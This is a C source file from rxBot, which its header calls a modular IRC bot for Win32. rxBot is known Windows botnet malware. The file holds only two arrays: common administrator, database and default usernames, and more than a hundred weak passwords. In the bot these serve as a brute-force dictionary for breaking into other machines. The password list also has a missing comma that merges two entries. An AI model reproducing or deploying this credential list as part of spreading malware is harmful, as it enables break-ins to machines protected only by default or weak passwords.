/*

    rxBot - a modular IRC bot for Win32
    Copyright (C) 2004

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

*/

char *usernames[]={
	"administrator",
	"administrador",
	"administrateur",
	"administrat",
	"admins",
	"admin",
	"staff",
	"root",
	"computer",
	"owner",
	"student",
	"teacher",
	"wwwadmin",
	"guest",
	"default",
	"database",
	"dba",
	"oracle",
	"db2",
	NULL
};

char *passwords[]={
	"",
	"administrator",
	"administrador",
	"administrateur",
	"administrat",
	"admins",
	"admin",
	"adm",
	"password1",
	"password",
	"passwd",
	"pass1234",
	"pass",
	"pwd",
	"007",
	"1",
	"12",
	"123",
	"1234",
	"12345",
	"123456",
	"1234567",
	"12345678",
	"123456789",
	"1234567890",
	"2000",
	"2001",
	"2002",
	"2003",
	"2004",
	"test",
	"guest",
	"none",
	"demo",
	"unix",
	"linux",
	"changeme",
	"default",
	"system",
	"server",
	"root",
	"null",
	"qwerty",
	"mail",
	"outlook",
	"web",
	"www",
	"internet",
	"accounts",
	"accounting",
	"home",
	"homeuser",
	"user",
	"oem",
	"oemuser",
	"oeminstall",
	"windows",
	"win98",
	"win2k",
	"winxp",
	"winnt",
	"win2000",
	"qaz",
	"asd",
	"zxc",
	"qwe",
	"bob",
	"jen",
	"joe",
	"fred",
	"bill",
	"mike",
	"john",
	"peter",
	"luke",
	"sam",
	"sue",
	"susan",
	"peter",
	"brian",
	"lee",
	"neil",
	"ian",
	"chris",
	"eric",
	"george",
	"kate",
	"bob",
	"katie",
	"mary",
	"login",
	"loginpass",
	"technical",
	"backup",
	"exchange",
	"fuck",
	"bitch",
	"slut",
	"sex",
	"god",
	"hell",
	"hello",
	"domain",
	"domainpass",
	"domainpassword",
	"database",
	"access",
	"dbpass",
	"dbpassword",
	"databasepass",
	"data",
	"databasepassword",
	"db1",
	"db2",
	"db1234",
	"sa",
	"sql",
	"sqlpass"
	"oainstall",
	"orainstall",
	"oracle",
	"ibm",
	"cisco",
	"dell",
	"compaq",
	"siemens",
	"hp",
	"nokia",
	"xp",
	"control",
	"office",
	"blank",
	"winpass",
	"main",
	"lan",
	"internet",
	"intranet",
	"student",
	"teacher",
	"staff",
	NULL
};
